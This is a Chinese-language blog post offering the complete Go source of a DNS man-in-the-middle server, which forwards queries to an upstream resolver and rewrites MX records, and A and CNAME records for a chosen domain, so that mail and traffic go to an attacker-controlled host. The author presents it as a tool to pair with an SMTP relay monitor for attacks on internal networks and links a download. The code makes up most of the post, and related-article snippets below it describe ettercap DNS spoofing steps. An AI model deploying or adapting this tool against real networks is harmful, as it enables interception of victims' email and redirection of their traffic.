dns服务器 、dns中间人篡改服务器

最新推荐文章于 2024-08-13 08:08:26 发布
最新推荐文章于 2024-08-13 08:08:26 发布
阅读量3.2k 收藏
点赞数
分类专栏: 渗透测试相关 Golang 工具源码 Windows 系统应用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yatere/article/details/43318147
版权

软件介绍: 

本身为独立执行程序,跨平台,可以充当正常dns服务器。默认情况下,本程序只篡改MX(邮件交换记录)为特定主机。


作用:

本软件 与 本博客前文中的 smtp 中继监控服务器程序 结合来实施攻击,特别在内网中。


其他:

如果需要实现高级的基于特定域名的篡改,修改代码即可。

package main

import (
	"flag"
	"fmt"
	"github.com/miekg/dns"
	"os"
	"strings"
)

var (
	remote = "114.114.114.114:53"
	local  = ":53"
	quiet  = true
	server string
	ip     string
)

func main() {

	s := flag.String("Dom", "mail.yk.com", "请输入所有mx服务器要转发的FQDN(例如:mail.xxx.com)【可选】")
	host := flag.String("Add", "127.0.0.1", "请输入所有mx服务器要转发的IP地址(例如:192.168.1.1)")

	flag.Parse()
	server = *s + "."
	ip = *host

	dns.HandleFunc(".", proxyServe)

	failure := make(chan error, 1)

	go func(failure chan error) {
		failure <- dns.ListenAndServe(local, "tcp", nil)
	}(failure)

	go func(failure chan error) {
		failure <- dns.ListenAndServe(local, "udp", nil)
	}(failure)

	fmt.Println(<-failure)
	os.Exit(1)
}

func proxyServe(w dns.ResponseWriter, req *dns.Msg) {
	defer func() {
		if err := recover(); err != nil {
			fmt.Println(err)
		}
	}()
	if req.MsgHdr.Response == true { // supposed responses sent to us are bogus
		return
	}

	c := new(dns.Client)
	c.Net = "udp"
	m, _, err := c.Exchange(req, remote)

	if !quiet {
		fmt.Println(req)
		fmt.Println(m)
	}

	if err != nil {
		fmt.Println(err)
	} else {


		if m.Question[0].Qtype == 1 { //15 表示A记录

			if m.Question[0].Name == server {
				n := len(m.Answer)
				for i := 0; i < n; i++ {
					s := strings.Fields(m.Answer[i].String())
					s[4] = ip
					m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
				}

			}

		}

		if m.Question[0].Qtype == 5 { //=5 表示CN记录

			if m.Question[0].Name == server {
				n := len(m.Answer)
				for i := 0; i < n; i++ {
					s := strings.Fields(m.Answer[i].String())
					if s[3] == "A" {
						s[4] = ip
						m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))
					}
				}

			}

		}

		if m.Question[0].Qtype == 15 { //15 表示MX记录
			n := len(m.Answer)
			for i := 0; i < n; i++ {
				s := strings.Fields(m.Answer[i].String())
				s[5] = server
				m.Answer[i], _ = dns.NewRR(strings.Join(s, "\t"))

			}
		}
		w.WriteMsg(m)

	}
}



下载地址:

点击下载


Yatere
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网攻防-DNS 欺骗 (中间人攻击)
dongxieaitonglao的博客
03-04 313
条件:1.局域网内(虚拟机的桥接模式) 工具:ettercap 步骤:1. vi /etc/ettercap/etter.dns 把www.baidu.com 解析到192.168.0.101 kali中的文件自带主页 /var/www/html/index.html,把kali开启apache2服务, service apache2 status ...
DNS篡改
Mitsuichi的博客
02-06 229
DNS篡改C:\Windows\System32\drivers\etc 改host文件 在空白处写上改到的网页的IP地址+空格+被篡改的网页的网址
中间人DNS协议
qq_45510720的博客
08-21 179
进入Kali Linux:root@kali:/home/yosel/桌面# sudo ettercap -G root@kali:/home/yosel/桌面# cd /etc/ettercap/ root@kali:/etc/ettercap# ls etter.conf etter.dns etter.mdns etter.nbns root@kali:/etc/ettercap# vim etter.dns 设置百度dns自定义 完成了百度DNS替换 测试百度网页是否成功
第35篇:某区宽带用户路由器DNS篡改事件分析(DNS重绑定攻击)
ABC_123的博客
12-07 1267
Part1 前言攻击事件描述如下:当时有几个区的部分用户访问一些网站会跳出菠菜、色情页面,最后工作人员发现这些用户的家用路由器DNS都被篡改了,这些DNS统计下来有几十个,部分DNS服务器被威胁情报标记为恶意ip,然后部分路由器密码也被重置。将路由器恢复出厂设置之后,一切恢复正常,但是发现过几天DNS又会被篡改,最后客户通过屏蔽恶意DNS服务器ip地址,解决了这一次攻击事件。这个事件过去很多年...
家用路由器DNS被恶意篡改,如何解决?
yang295242361的博客
08-12 400
当家用路由器的DNS被恶意篡改时,我们可以采取一系列措施来应对和恢复,确保网络的安全和稳定。以下是一些具体的应对步骤
LinuxDNS服务器安装、配置和维护
01-29
此外,还需要考虑DNS安全,如启用DNSSEC(DNS Security Extensions)来防止中间人攻击和数据篡改。 维护DNS服务器涉及定期更新记录以适应网络变化,监控服务器性能,确保高可用性和正确性。这包括定期备份DNS配置,...
DNS域名劫持服务器
06-07
5. **安全与隐私**:由于DNS服务器处理敏感的用户请求,开发者必须考虑安全性,防止中间人攻击和其他潜在的安全漏洞。这包括加密传输、防止缓冲区溢出等。 6. **多线程与并发**:DNS服务器需要处理多个并发请求,...
DNS域名劫持服务器DnsServer-2019.zip
07-27
3. 中间人攻击:攻击者可监控并拦截所有通过假冒服务器的通信,窃取数据。 防范措施包括: - 定期更新DNS服务器软件,修复已知漏洞。 - 使用HTTPS等加密协议保护通信安全。 - 使用DNSSEC(DNS Security Extensions...
Go-TentaDNS-采用Go语言开发的DNS服务器
08-13
DNS-over-TLS是通过TLS(Transport Layer Security)协议加密DNS通信,保护用户隐私,防止中间人攻击。Go-TentaDNS提供的此功能让用户可以更安全地进行DNS查询,因为所有的查询都将通过加密通道进行,增加了网络通信...
RFC1035 DNS服务器标准 协议
07-17
RFC1035本身未涵盖DNS安全,但后来的RFC如RFC4033、4034和4035(DNSSEC)引入了签名和验证机制,以防止中间人攻击和数据篡改。 **6. 性能优化** 为了提高性能,DNS系统使用了缓存和递归查询。缓存解析器保存先前...
DNS 中间人攻击分析
07-14
分析了DNS中间人攻击过程,并给出了防范的措施。
中间人攻击之DNS劫持
光明矢的专栏
11-27 3260
中间人攻击之DNS劫持
中间人攻击之DNS欺骗
qq_53058639的博客
07-31 532
前段时间学了学中间人攻击的有关知识,写篇文章记录下中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)是一种“间接”的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”百度百科:域名系统(Domain NameSystem,DNS)是Internet上解决网上机器命名的一种系统。
域名服务器
weixin_44959377的博客
12-24 1251
分类 1,根域名服务器 2,顶级域名服务器 3,权限域名服务器 4,本地域名服务器 根域名服务器 1,最高层次、最重要的域名服务器,知道所有的顶级域名服务器的域名和ip地址。 2,要是本地域名服务器无法解析域名,首先交给根域名服务器。 3.在迭代查询时,根域名服务器并不直接把域名转为ip地址,而是把顶级域名服务器的IP发给本地域名服务器,让本地域名服务器去找顶级域名服务器。 顶级域名服务器 1,管...
GO-DNS-programming
Starr
02-26 1049
文章目录1. 查询A记录2. 猜解子域lookupworkermain3. DNS proxy环境DNS server testmain(问题遗留)CS监听器以及payload(问题遗留) 需要了解的一些DNS相关的概念: 完全限定域名(Fully Qualified Domain Name,FQDN), 即[hostname].[domain].[tld]; A记录,用来记录域名对应的 IP 地址,缺点是容易被发现服务器的真实 IP; CNAME 记录,也叫别名记录,用来把域名解析到别的域名(或者说A记
golang获取本地dns服务器
dianhuaipai9282的博客
03-29 1058
使用"github.com/miekg/dns"库可以解析/etc/resolv.conf,从而获取dns服务器 参考代码: https://github.com/deepFoc/go-code/blob/master/localdns/main.go 转载于:https://www.cnblogs.com/zcqkk/p/10621037.html...
在Golang中获取DNS记录
jycg789的博客
11-25 443
使用Golang获取域名的DNS记录, 包括A / CNAME等类型. 方案1: 官方net包 只举例获取CNAME类型的解析记录, 其他类型大同小异. funcCNAME(srcstring)(dststring,errerror){ dst,err=net.LookupCNAME(src) return } 官方net包调用的是系统API, 所以在不同的系统上可能有不同的结果, 我测试当一个域名的解析记录如下时, linux和windows返回的结果不一致....
开源项目 `miekg/dns` 使用教程
最新发布
gitblog_00857的博客
08-13 403
开源项目 miekg/dns 使用教程 dnsDNS library in Go项目地址:https://gitcode.com/gh_mirrors/dn/dns 项目介绍 miekg/dns 是一个用 Go 语言编写的 DNS 库,提供了丰富的 DNS 协议处理功能。该项目支持多种 DNS 记录类型和查询类型,适用于构建 DNS 服务器、客户端和其他 DNS 相关工具。 项目快速启动 环境准...
泛域名解析和域名解析的区别+DNS
skyfans的博客
04-01 2188
泛域名解析是指将*.域名解析到同一个IP下。 泛域名解析和域名解析有何不同? 泛域名解析是指:*.域名解析到同一IP下。 域名解析是指:子域名.域名解析到同一IP下。 注意:只有你的空间是独立IP的时候泛域名的应用才有意义,而域名解析则没有此要求。 ———————————————————————————————————————— DNS域名系统 (英文:Domain Name System,缩写:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值